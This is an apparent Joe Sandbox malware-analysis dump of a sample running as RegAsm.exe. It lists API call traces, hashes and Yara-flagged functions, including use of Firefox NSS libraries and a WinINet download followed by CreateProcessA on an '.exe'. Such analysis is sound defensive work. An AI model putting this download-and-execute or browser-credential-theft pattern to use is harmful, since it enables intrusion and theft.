                                                                                                          • Part of subcall function 6C210FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211000
                                                                                                          • Part of subcall function 6C210FF0: PR_NewLock.NSS3(?,00000800,6C1AEF74,00000000), ref: 6C211016
                                                                                                          • Part of subcall function 6C210FF0: PL_InitArenaPool.NSS3(00000000,security,6C1B87ED,00000008,?,00000800,6C1AEF74,00000000), ref: 6C21102B
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C20ECD1
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C20ED02
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21116E
                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C20ED5A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2957673229-0
                                                                                                        • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                        • Instruction ID: 1e4ead622d26c57925889f036addc2ff31024c0e53020f1fbb18b4b917d62571
                                                                                                        • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                        • Instruction Fuzzy Hash: FC21CFB5E007469BE700CF25D944B52B7E8EFA5309F25821AAC1C87A61EB70E5D4C6D0
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,00000004,6C1EC79F,?,?,6C205C4A,?), ref: 6C204950
                                                                                                          • Part of subcall function 6C208800: TlsGetValue.KERNEL32(?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208821
                                                                                                          • Part of subcall function 6C208800: TlsGetValue.KERNEL32(?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C20883D
                                                                                                          • Part of subcall function 6C208800: EnterCriticalSection.KERNEL32(?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208856
                                                                                                          • Part of subcall function 6C208800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C208887
                                                                                                          • Part of subcall function 6C208800: PR_Unlock.NSS3(?,?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208899
                                                                                                        • TlsGetValue.KERNEL32(?,?,?), ref: 6C20496A
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C20497A
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C204989
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3904631464-0
                                                                                                        • Opcode ID: 943df6e53a86edbd94b5be45b9c62ef05cdbc9b7fd1cc141b5697f56f8cbde9c
                                                                                                        • Instruction ID: fdd11a747f9ca8ff175f5e87b905504b07f41a63c42661e254c5e145dbbef0f3
                                                                                                        • Opcode Fuzzy Hash: 943df6e53a86edbd94b5be45b9c62ef05cdbc9b7fd1cc141b5697f56f8cbde9c
                                                                                                        • Instruction Fuzzy Hash: 551126B6B0060D9FEB009F28DD42A1673BCFB1632DF144137ED4A87E11EB22E8148791
                                                                                                        APIs
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C2209B3,0000001A,?), ref: 6C2208E9
                                                                                                          • Part of subcall function 6C210840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C2108B4
                                                                                                        • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C2208FD
                                                                                                          • Part of subcall function 6C20FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C208D2D,?,00000000,?), ref: 6C20FB85
                                                                                                          • Part of subcall function 6C20FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C20FBB1
                                                                                                        • SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C220939
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C220953
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2572351645-0
                                                                                                        • Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
                                                                                                        • Instruction ID: 88fd03686d3f2b9a4a9a5064544c468ea9e2a4e42168b8c03d1fd07579f1df40
                                                                                                        • Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
                                                                                                        • Instruction Fuzzy Hash: 490100B1A0174F2BFB04DB369C20F6737999F40619F004039FC1BC6A01FB25E418DA94
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C227FFA,?,6C229767,?,8B7874C0,0000A48E), ref: 6C23EDD4
                                                                                                        • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C227FFA,?,6C229767,?,8B7874C0,0000A48E), ref: 6C23EDFD
                                                                                                        • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C227FFA,?,6C229767,?,8B7874C0,0000A48E), ref: 6C23EE14
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
                                                                                                        • memcpy.VCRUNTIME140(?,?,6C229767,00000000,00000000,6C227FFA,?,6C229767,?,8B7874C0,0000A48E), ref: 6C23EE33
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3903481028-0
                                                                                                        • Opcode ID: 09651d523c9247505a8e8f74e9a72560a0f45c7a551a9f6010e5350354c9693b
                                                                                                        • Instruction ID: 323210463dbaeefe443faafa1ce1afff6edec7272dfc5967b17f270a05061da8
                                                                                                        • Opcode Fuzzy Hash: 09651d523c9247505a8e8f74e9a72560a0f45c7a551a9f6010e5350354c9693b
                                                                                                        • Instruction Fuzzy Hash: 8B1198F560071E6BD7109E65DC84B06B358EF0435DF104535ED1D82A40E330E868C7E1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 284873373-0
                                                                                                        • Opcode ID: 90bc85cfc6442cf4e1dace5760eb41e788f01913fc2d038a4be86ec397e74634
                                                                                                        • Instruction ID: 71caf17d7997b375f9b24acfc1b717665014203641a18f12149db20479e432fa
                                                                                                        • Opcode Fuzzy Hash: 90bc85cfc6442cf4e1dace5760eb41e788f01913fc2d038a4be86ec397e74634
                                                                                                        • Instruction Fuzzy Hash: A1118C75605A059FD700AF78D4882AABBF4FF05714F02496ADC88D7B00E730E8A4CBD2
                                                                                                        APIs
                                                                                                        • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C245F17,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25AC94
                                                                                                        • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C245F17,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25ACA6
                                                                                                        • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25ACC0
                                                                                                        • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C24AAD4), ref: 6C25ACDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$DestroyFreeK11_Monitor
                                                                                                        • String ID:
                                                                                                        • API String ID: 3989322779-0
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(00000000,?,?,6C2108AA,?), ref: 6C2088F6
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C2108AA,?), ref: 6C20890B
                                                                                                        • PR_NotifyCondVar.NSS3(?,?,?,?,?,6C2108AA,?), ref: 6C208936
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C2108AA,?), ref: 6C208940
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CondCriticalEnterNotifySectionUnlockValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 959714679-0
                                                                                                        APIs
                                                                                                        • PR_CallOnce.NSS3(6C312F88,6C240660,00000020,00000000,?,?,6C242C3D,?,00000000,00000000,?,6C242A28,00000060,00000001), ref: 6C240860
                                                                                                          • Part of subcall function 6C134C70: TlsGetValue.KERNEL32(?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134C97
                                                                                                          • Part of subcall function 6C134C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CB0
                                                                                                          • Part of subcall function 6C134C70: PR_Unlock.NSS3(?,?,?,?,?,6C133921,6C3114E4,6C27CC70), ref: 6C134CC9
                                                                                                        • TlsGetValue.KERNEL32(00000020,00000000,?,?,6C242C3D,?,00000000,00000000,?,6C242A28,00000060,00000001), ref: 6C240874
                                                                                                        • EnterCriticalSection.KERNEL32(00000001), ref: 6C240884
                                                                                                        • PR_Unlock.NSS3 ref: 6C2408A3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterSectionUnlockValue$CallOnce
                                                                                                        • String ID:
                                                                                                        • API String ID: 2502187247-0
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                        • wsprintfA.USER32 ref: 00410D16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1243822799-0
                                                                                                        APIs
                                                                                                        • CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00414FAC,?,?,?,00414FAC,?), ref: 00412199
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121A4
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121AC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandle$CreateSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 4148174661-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalDeleteSectionfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 2988086103-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00405237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                          • Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                          • Part of subcall function 00405237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                          • Part of subcall function 00405237: StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                          • Part of subcall function 00405237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                          • Part of subcall function 00405237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                          • Part of subcall function 00405237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                          • Part of subcall function 00405237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                        • _memset.LIBCMT ref: 00412CDF
                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                        • String ID: .exe
                                                                                                        • API String ID: 2831197775-4119554291
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C204D57
                                                                                                        • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C204DE6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorR_snprintf
                                                                                                        • String ID: %d.%d
                                                                                                        • API String ID: 2298970422-3954714993
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Xinvalid_argument_memmovestd::_
                                                                                                        • String ID: string too long
                                                                                                        • API String ID: 256744135-2556327735
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: malloc
                                                                                                        • String ID: image/jpeg
                                                                                                        • API String ID: 2803490479-3785015651
                                                                                                        APIs
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F13E
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                                                          • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
                                                                                                          • Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242
                                                                                                        • _memmove.LIBCMT ref: 0040F190
                                                                                                        Strings
                                                                                                        • invalid string position, xrefs: 0040F139
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                        • String ID: invalid string position
                                                                                                        • API String ID: 3404309857-1799206989
                                                                                                        APIs
                                                                                                        • sqlite3_value_text.NSS3(?), ref: 6C2A0917
                                                                                                        • sqlite3_value_text.NSS3(?), ref: 6C2A0923
                                                                                                          • Part of subcall function 6C1613C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C132352,?,00000000,?,?), ref: 6C161413
                                                                                                          • Part of subcall function 6C1613C0: memcpy.VCRUNTIME140(00000000,6C132352,00000002,?,?,?,?,6C132352,?,00000000,?,?), ref: 6C1614C0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_value_text$memcpystrlen
                                                                                                        • String ID: error in %s %s%s%s: %s
                                                                                                        • API String ID: 1937290486-1007276823
                                                                                                        APIs
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F35C
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                                                          • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
                                                                                                        • memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,75920440,?,-00000001), ref: 0040F392
                                                                                                        Strings
                                                                                                        • invalid string position, xrefs: 0040F357
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                        • String ID: invalid string position
                                                                                                        • API String ID: 1659287814-1799206989
                                                                                                        APIs
                                                                                                        • strcpy_s.MSVCRT ref: 004281DE
                                                                                                        • __invoke_watson.LIBCMT ref: 00428232
                                                                                                          • Part of subcall function 0042806D: _strcat_s.LIBCMT ref: 0042808C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __invoke_watson_strcat_sstrcpy_s
                                                                                                        • String ID: ,NC
                                                                                                        • API String ID: 1132195725-1329140791
                                                                                                        APIs
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3('8"l,00000000,00000000,?,?,6C223827,?,00000000), ref: 6C224D0A
                                                                                                          • Part of subcall function 6C210840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C2108B4
                                                                                                        • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C224D22
                                                                                                          • Part of subcall function 6C20FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C1B1A3E,00000048,00000054), ref: 6C20FD56
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                        • String ID: '8"l
                                                                                                        • API String ID: 1521942269-3580860384
                                                                                                        APIs
                                                                                                        • PR_GetUniqueIdentity.NSS3(SSL), ref: 6C24AF78
                                                                                                          • Part of subcall function 6C1AACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C1AACE2
                                                                                                          • Part of subcall function 6C1AACC0: malloc.MOZGLUE(00000001), ref: 6C1AACEC
                                                                                                          • Part of subcall function 6C1AACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C1AAD02
                                                                                                          • Part of subcall function 6C1AACC0: TlsGetValue.KERNEL32 ref: 6C1AAD3C
                                                                                                          • Part of subcall function 6C1AACC0: calloc.MOZGLUE(00000001,?), ref: 6C1AAD8C
